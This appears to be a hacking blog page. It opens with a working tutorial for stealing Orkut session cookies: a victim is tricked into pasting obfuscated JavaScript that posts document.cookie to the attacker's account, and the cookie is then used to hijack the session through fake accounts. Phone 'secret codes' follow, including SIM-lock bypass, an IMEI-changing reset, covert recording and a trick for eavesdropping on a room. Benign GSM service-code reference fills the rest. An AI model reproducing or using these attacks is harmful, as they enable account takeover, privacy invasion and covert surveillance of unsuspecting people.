*This list includes the most popular and much needed tools, utilities and software that all computer security
enthusiasts must play and experiment with. If you wish to recommend, suggest or contribute your favorite
tools to this list, then please email me at fadia.ankit@gmail.com. The subject of the email should be
AFCEH Top Hacking Tool and the body/message should contain your favorite software tool and its
download link/URL.

First get firefox and the cookie editor plugin for it…u will need them…

Then make two fake accounts…u will ned one to receive the cookie
and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised…the choice is yours though..

javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101)); nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;
nobody.submit()

U see the 62915936 part? Thats the one u need to edit to get the cookie to your account…..

Now here is the script Code:

HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:

1) Go to YOUR ALBUM section.

2) Go to ANY photo and right click on it , see the properties of your display image…u will see something like 12345678.jpg

3) There will be a eight digit value.

4) Now put that value in the above javascript.

5) Thats it.

Now your javascript will look like:

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101));
nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;
nobody.submit()

Now give this script to the victim , ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook.

Now after getting a cookie…

1) Go to your home page

2) Open the cookie editor plugin
(TOOLS–>COOKIE EDITOR).

3) Type orkut in the text box and click filter/refresh.look for orkut_state cookie.

4) Just double click it and replace the orkut_state part with your victims. No need to change the _umbz _umbc part…

5) THATS IT!!

ANOTHER SCRIPT : (100%working)

javascript:nobody=replyForm;nobody.toUserId.value=53093255;

nobody.scrapText.value=document.cookie;nobody.

action=’scrapbook.aspx?Action.submit’;nobody.submit()

Put ur eight digit number in the place of (53093255)

*#06# -> Show IMEI

*#9999# -> Show Software Version

*#0837# -> Show Software Version (instructions)

*#0001# -> Show Serial Parameters

*#9125# -> Activates the smiley when charging.
*#9998*228# -> Battery status (capacity, voltage, temperature)

*#9998*246# -> Program status

*#9998*289# -> Change Alarm Buzzer Frequenc
y
*#9998*324# -> Debug screens

*#9998*364# -> Watchdog

*#9998*377# -> EEPROM Error Stack - Use side keys to select values. Cancel and ok.

*#9998*427# -> Trace Watchdog

*#9998*523# -> Change LCD contrast - Only with version G60RL01W

*#9998*544# -> Jig detect

*#9998*636# -> Memory status

*#9998*746# -> SIM File Size

*#9998*778# -> SIM Service Table

*#9998*785# -> RTK (Run Time Kernel) errors - if ok then phn is reset, info is put in memory error. *#9998*786# -> Run, Last UP, Last DOWN

*#9998*837# -> Software Version

*#9998*842# -> Test Vibrator - Flash the screenligth during 10 seconds and vibration activated.

*#9998*862# -> Vocoder Reg - Normal, Earphone or carkit can be selected

*#9998*872# -> Diag

*#9998*947# -> Reset On Fatal Error

*#9998*999# -> Last/Chk
*#9998*9266# -> Yann debug screen (=Debug Screens?)

*#9998*9999# -> Software version
*0001*s*f*t# -> Changes serial parameters (s=?, f=0,1, t=0,1) (incomplete)
*0002*?# -> unknown
*0003*?# -> unknown


SP-unlock SGH-600 and SGH 2100
*2767*3855# -> Full EEPROM Reset ( THIS CODE REMOVES the Security Lock and formats The Mobile's Chipset )

But also changes IMEI to 447967-89-400044-0, To restore your old IMEI use the IMEI program found on the software page.



*2767*2878# -> Custom EEEPROM Reset ( does not change the securitu CODE )



These codes has been tested with version FLD_2C6 G60SB03X of Samsung SGH-600

try dese out

Tips and Tricks for the D820, D900, and other Samsung phones with similar firmware.

#*22671* - Starts the phone recording in the background. It can record up to an hour, secretly. Press #*22672*

Holding the volume button when the screen is off displays a short summary of information. Time, Date, signal, missed calls, etc...


Enter code *#1234# to display Firmware version of the phone
Example : D900XAFG6
D900 = model
XA = Region / Country
F = Year (2006)
G = Month (July)
6 = Firmware Release in month (so this is the 6th revision)

Hold down # to mute, or unmute the phone.

Press 1 while watching a video to make it full screen.

While playing a song in music player u can highlight a part of the song to be repeated over, while listening to the song press 7 at the point u want repeated then press 7 again at the end of the section and it will loop the section between the the two presses of 7

If you need to send a photo via mms and its too big to send and u have no pc available to downsize the pic (my limit is 100kb via mms with my sim) open the photo in photo editor on the phone and "save as" rename it differently from the original and u will have two copys of the pic and the edited version will be under 100kb.

Hidden Menu: *#8999*8378#

Make MP3 sound louder:
1. hit: *#8999*8378#
2. hit: 2, and then 2 again.
3. then on IIS NORMAL (or hit 9)
4. then on "Rx vol."
5. for level 10, click 0
then save

Orignals are:
level 10 = 10
level 9 = 18

Make sound setting louder when som1s calling:
1. *#8999*8378#
2. 2 times 2
3. 1 (NORMAL)
4. then on "Rx vol."
5. level 5 type 140 instead of 120

Any other tips or tricks? Feel free to post them.

*** WARNING: Using secret codes may be harmful to your phone and result in disabling or worse. Use these codes at your own discretion, we accept no responsiblility for blocked pones while using these codes!!!
IMEI Number
*#06# Cells Identity Code (IMEI = International Mobile Equipment Identity)
XXXXXX XX XXXXXX X
TAC FAC SNR SP
TAC = Type Approval Code (first 2 digits = country code of the approval-country )
FAC = Final Assembly Code: (01,02 = AEG)
(10,20 Nokia)
(40,41,44 Siemens)
(30 Ericsson)
(50 Bosch)
(51 Sony,Siemens,Ericsson)
(60 Alcatel)
(65 AEG)
(70 Sagem)
(75 Dancall)
(80 Philips)
(85 Panasonic)
SNR = Serial Nr.
SP = Spare (always "0")

Software Version
*#0000# shows the software version
Signal Processing
*3370# - Enchanced full Rate Codec (EFR) activation. It will automatically restart.
#3370# - Enchanced full Rate Codec (EFR) deactivation
*4720# - Half Rate Codec activation. It will automatically restart.
#4720# - Half Rate Codec deactivation
Enchanced Full Rate will give you much better sound quality when you enable it. The new Enhanced Full Rate CODEC adopted by GSM uses the ASELP (AlgebraicCode Excitation Linear Prediction) compression technology. This technology allows for much great voice quality in the same number of bits as the older Full Rate CODEC. The older technology was called LPC-RPE (Linear Prediction Coding with Regular Pulse Excitation). Both operate at 13 kilobits.(but you take up more space on the network, so they can charge you more) - Talk-time is reduced with about 5%



Sim Clock Stopping
*#746025625#
[*#sim0clock#]
Checks if the sim clock can be stopped. Sim clock stop is a kind of stand-by mode which will save battery time. This code doesn't work with software version 4.59.
It will tell you if it can be stopped or not.


Warrenty Menu
*#92702689# takes you to a secret menu with 6 choices:
[*#war0anty#]
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture (0997).
3. Displays (if there) the date where the phone was purchased (MMYY).
4. Displays the date of the last repairment - if found (0000).
5. Makes you capable of transferring user data if you have the gear for it.
6. Shows how long the phone has been used to talk. This counter is not reset by when you "clear timers" like the counters in the call register.


Bypass the SP lock With a Nokia 16xx/21xx/31xx/51xx/81xx
1. Insert SIM card of different provider.
2. Turn on the phone and press the UP VOLUME key for 3 sec.
Then release it and the phone says PIN CODE?
3. Press the "C" key.
4. Then Press * and wait until it disappears and appears again, then press * one more time and 04*PIN*PIN*PIN#


Nokia Speed Trap Detector Urban Legend spread by Nokia Engineers ;^)
The settings for radar speed traps detector. Your Nokia cell phone can be programmed to pick up radar speed traps, when programmed your cell phone picks up the radar and alerts you on the message alert tone. ( Doesn't work with Nokia 7110! )
1. Enter your menu
2. Select settings
3. Select security settings
4. Select closed user group
5. Select on
6. Enter 00000
7. Press ok
8. Clear back to normal, within a few seconds your phone will display a radar sign with five zero's next to it. It is now activated.
Unfortunately only Nokia phones have this function. The Cell Phone info display needs to be de-activated. Settings -> Phone Settings -> Cell Info display. Each time you turn off your phone, or even each time you loose contact with your carrier, you'll have to activate it again... It is done using steps 1 through 5 above, but the number (00000) will be already on the field as a default.



The James Bond Trick



If you short-circuit the left middle and right pins on the bottom of the phone with all connections touching each other, the Nokia software hangs! The profile "Headset" will be activated. Before you do this just activate the "Automatic Answer" in the headset profile and set the ringing volume to "Mute". Now you can use your phone for checking out what people are talking about in a room. Just place it under a table in a room and call it. The phone receives the call without ringing and you can listen to what people are saying! Network Monitor
There is a hidden menu inside your Nokia phone. If you want to activate it, you'll have to re-program some chips inside of your phone.
Check your software version. You can only continue if you have v4.33, v4.73 or v5.24.
Take apart the phone.
De-solder the EEPROM (ATMEL AT 24C64)
Read out the data with an EEPROM programmer and save it to a file (Backup)
If you have v.33 or v4.73, change the address "03B8" from "00" to "FF"
If you have v5.24 then change the address "0378" from "00" to "FF"
Write the new data to the EEPROM and solder it back to the phone
Power on your phone and you should have "Netmonitor" enabled.
The Network Monitor gives you the following information:
Carrier number, MS RX Level in DBM, Received signal quality, MS TX power level, C1 (Path loss criterion, used for cell selection and reselection). The range is -99 to 99, RTL (Radio link timeout), Timeslot, Indication of the transmitter status, Information on the Network parameters, TMSI (Temporary Mobile Subscriber Identity), Cell identification (Cell ID, Number of cells being used), MCC (Mobile country code), MCN (Mobile network code), LAC (Location area code), Ciphering (On/Off), Hopping (On/Off), DTX (On/Off), Discard cell barred information.


Game Hacking with Blizzard



Get the file called the 'BlizzardN-GAGE.SIS' from IRC get in #mediaplace on Efnet (note: Downloading cracked/Hacked games is illegal unless you already own a copy of game)
The Blizzard Nokia N-Gage Installer.
1. Unpack Blizzard.sis file that you get from mIRC
2. Transfer the .sis file to your N-Gage
3. Get the .blz (N-gage ROM) from mIRC
4. copy the file to the root dir of your MMC (16MB MMC)Multimedia Card
5. Use the Blizzard application to unpack the .blz file
6. After unpacking the sonic icon should appeared in the MENU
7. Clicked sonic icon and it should work !



List of compatible games for the 3650,6600 and the N-gage that work:
[3650]
SonicN (v.2.5+)
Puyo Pop (v.2.5+)
[6600]
SonicN
Puyo Pop
Pandemonium
Tomb Raider
Super Monkey Ball
Tony Hawks Pro Skater
[N-Gage]
SonicN
Puyo Pop
Pandemonium
Tomb Raider
Super Monkey Ball
Tony Hawks Pro Skater
GSM Network Services Command Strings
When various network functions are selected via the cellphone's menu using the keypad, the cellphone automatically generates the corresponding GSM network command string and transmits it to the network. These commands can however be manually entered via the keypad.


Each command is prefixed with either one or two * or # characters as follows:
** Register and Activate
* Activate
## De-Register (and Deactivate)
# Deactivate
*# Check Status
© Call button


Once each command has been entered, if it is a network command (as opposed to a local handset command) it must be transmitted to the network by pressing the YES (receiver) key which acts as an enter key - this is represented here with the © character. Always enter numbers in full international format +CountryAreaNumber ( e.g. +447712345678).
Command Description Command String
Security
Change call barring code **03*OldCode*NewCode*NewCode#©
Change call barring code **03*330*OldCode*NewCode*NewCode#©
Change PIN code **04*OldPIN*NewPIN*NewPIN#©
Change PIN2 code **042*OldPIN2*NewPIN2*NewPIN2#©
Unlock PIN code (when PIN is entered wrong 3 times) **05*PUK*NewPIN*NewPIN#©
Unlock PIN2 code (when PIN2 is entered wrong 3 times) **052*PUK2*NewPIN2*NewPIN2#©
Display IMEI *#06#
Call Forwarding (Diversions)
De-register all call diversions ##002#©
Set all configured call diversions to number and activate **004*number#©
De-register all configured call diversions (no answer, not reachable, busy) ##004#©
Unconditionally divert all calls to number and activate **21*number#©
Activate unconditionally divert all calls *21#©
De-register unconditionally divert all calls ##21#©
Deactivate unconditionally divert all calls #21#©
Check status of unconditionally divert all calls *#21#©
Divert on no answer to number and activate **61*number#©
Activate divert on no answer *61#©
De-register divert on no answer ##61#©
Deactivate divert on no answer #61#©
Check status of divert on no answer *#61#©
Divert on not reachable to number and activate **62*number#©
Activate divert on not reachable *62#©
De-register divert on not reachable ##62#©
Deactivate divert on not reachable #62#©
Check status of divert on not reachable *#62#©
Divert on busy to number and activate /td> **67*number#©<
Activate divert on busy *67#©
De-register divert on busy ##67#©
Deactivate divert on busy #67#©
Check status of divert on busy *#67#©
Change number of seconds of ringing for the given service before diverting a call (such as on no answer). Seconds must be a value from 5 to 30. De-registering the same divert will also delete this change! **service*number**seconds#© (Service numbers, see below)
Call barring
Activate barr all outgoing calls (see Security to set code) **33*code#©
Deactivate barr all outgoing calls #33*code#©
Check status of barr all outgoing calls *#33#©
Activate barr all calls **330*code#©
Deactivate barr all calls #330*code#©
Check status of barr all calls /td> *#330*code#©<
Activate barr all outgoing international calls **331*code#©
Deactivate barr all outgoing international calls #331*code#©
Check status of barr all outgoing international calls *#331#©
Activate barr all outgoing international calls except to home country **332*code#©
Deactivate barr all outgoing international calls except to home country #332*code#©
Check status of barr all outgoing international calls except to home country *#332#©
Activate barr all outgoing calls **333*code#©
Deactivate barr all outgoing calls #333*code#©
Check status of barr all outgoing calls *#333#©
Activate barr all incoming calls **35*code#©
Deactivate barr all incoming calls #35*code#©
Check status of barr all incoming calls *#35#©
Activate barr all incoming calls when roaming **351*code#©
Deactivate barr all incoming calls when roaming #351*code#©
Check status of barr all incoming calls when roaming *#351#©
Activate barr all incoming calls **353*code#©
Deactivate barr all incoming calls #353*code#©
Check status of barr all incoming calls *#353#©
Call waiting
Activate call waiting *43*#©
Deactivate call waiting #43##©
Check status of call waiting *#43#©
Calling Line Identification
The following only works if CLIP and CLIR are enabled (ask your service provider)
CLIP: Presentation of the number of the incoming call
Activate CLIP **30#©
Deactivate CLIP ##30#©
Check status of CLIP *#30#©
CLIR: Presentation of one's own number to the to the called party
Activate CLIR **31#©
Activate CLIR for the actual call *31#number©
Deactivate CLIR ##31#©
Deactivate CLIR for the actual call #31#number©
Check status of CLIR *#31#©
COLP: Presentation of the actual number reached (if number called was diverted to another number
Activate COLP *76#©
Deactivate COLP #76#©
Check status of COLP *#76#©
COLR: Presentation of the original number called by the calling party (if the call was diverted to this cellphone)
Activate COLR *77#©
Deactivate COLR #77#©
Check status of COLR *#77#©

Cellphone Services
10 All types of cellphone services
11 Speech service
12 Data service
13 Fax
14 Datex-J
15 Teletex
16 Short message service (SMS)
18 All data services without SMS
19 All cellphone services without SMS

Carrier Services
20 All services
21 All asynchronous services
22 All synchronous services
23 3.1kHz services
24 Synchronous point-to-point connections including PAD's (all synchronous data services)
25 Asynchronous point-to-point connections including PAD's (all asynchronous data services)
26 Data packet sending including PAD's (all synchronous data packet services)
27 Services with PAD-share
29 Digital connection with 12kbps

GSM Network Service Codes
Note that at present only the following service codes are in use:
11 Speech
13 fax
25 data

Cell Broadcast
While Short Message Service (SMS) can be configured as a personal service, Cell Broadcast is a general service which is designed for subscribers of a specific cell or topic. For example, a subscriber to cell 050 in England will receive information on the GSM tower currently being used by their phone. This new concept brings a whole new meaning to the term mobile communications as the phone is now able to receive information such as share prices or weather updates without the need of data cards and computers. At present the following message types exist (note: this may vary from carrier to carrier and some carriers may charge for this service):

Code Title
000 Index
010 Flashes
020 Hospitals
022 Doctors
024 Pharmacy
030 Long Distant Road Reports
032 Local Road Reports
034 Taxis
040 Weather
050 District
052 Network Information
054 Operator Services
056 Directory Inquiries (national)
057 Directory Inquiries (international)
058 Customer Care (national)
059 Customer Care (international)

In the future one will be able to control each individual call by use of the following service codes. To do this the user has to insert the service code in front of the last # in the MMI command above.




Or More

Secret Codes for some Nokia models
Nokia 9000/9000i

To view IMEI number *#06#
To view Software Version enter *#8110# Latest Version is under Phone Info.
To view Week and Year of manufacture enter *#3283#

Nokia 9110

*#06# for checking the IMEI (International Mobile Equipment Identity)
*#0000# shows the SW version.

Latest software version: v5.02 (26-08-99)RAE-2

Nokia 7110

*#06# for checking the IMEI (International Mobile Equipment Identity)
*#0000# To view Software Version.
*#3370# - Enhanced Full Rate Codec (EFR) activation. It will automatically restart.
*#3370* - Enhanced Full Rate Codec (EFR) deactivation. It will automatically restart.
*#4720# - Half Rate Codec activation. It will automatically restart
*#4720* - Half Rate Codec deactivation. It will automatically restart
*#746025625# - Sim clock allowed status.
*#92702689# [*#war0anty#] - takes you to a secret menu with 6 choices:

1. Displays Serial Number.
2. Displays the Month and Year of Manufacture (0997)
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repairment - if found (0000)
5. makes you capebel of transferring user data if you have the gear for it
6. shows how many hours the phone has been on

Latest software version: 4.77 25-01-00 NSE-5 - EFR and half rate codes do not work with these version.

V 4.76 13-01-00 NSE-5
V 4.75 07-01-00 NSE-5
V 4.73 15.11.99 NSE-5

Nokia 6190

*#06# for checking the IMEI (International Mobile Equipment Identity)
*#6190# shows the SW version.
*#92772689# (after removing the analog module) shows service menu.
*3001#12345[OK] to enter test mode.
*#639# to change NAM.

Nokia 3810

To view IMEI number *#06#
To view Software Version enter *#3810#

Nokia 6120 / 6160 / 6162 (TDMA phones)

*#92772689# for checking ISDN number.
*3001#12345# for field test mode and nam selection and some other stuff...
*#9999# shows the SW version


Nokia 3210 Secret Codes
Nokia 3210

*#06# for checking the IMEI (International Mobile Equipment Identity) Information you get from the IMEI:

XXXXXX XX XXXXXX X

TAC FAC SNR SP


TAC = Type approval code
FAC = Final assembly code
SNR = Serial number
SP = Spare

*#0000# To view Software Version.

#746025625# [*#sim0clock#]
Checks if the sim clock can be stopped. Sim clock stop is a kind of stand-by mode which will save battery time. This code doesn't work with software version 4.59.

*#92702689# [*#war0anty#] takes you to a secret menu with 6 choices:

1. Displays Serial Number.
2. Displays the Month and Year of Manufacture (0997)
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repairment - if found (0000)
5. makes you capebel of transferring user data if you have the gear for it
6. shows how many hours the phone has been on

Latest software version: V 5.02 NSE-8/9

*#3370# - Enhanced Full Rate Codec (EFR) activation. It will automatically restart.
*#3370* - Enhanced Full Rate Codec (EFR) deactivation. It will automatically restart.
*#4720# - Half Rate Codec activation. It will automatically restart
*#4720* - Half Rate Codec deactivation. It will automatically restart

Enhanced Full Rate will give you much better sound quality when you enable it. The new Enhanced Full Rate CODEC adopted by GSM uses the ASELP (Algebraic Code Excitation Linear Prediction) compression technology. This technology allows for much great voice quality in the same number of bits as the older Full Rate CODEC. The older technology was called LPC-RPE (Linear Prediction Coding with Regular Pulse Excitation). Both operate at 13 kilobits.(but you take up more space on the network, so they can charge you more) - Talk-time is reduced by about 5% when using the ERF option.

Counter

Followers

Blog Archive

Subscribe Via Email &Sms

Enter your email address:

Expert Hackers

Also Subscribe Via Sms Just click here to follow via
SMS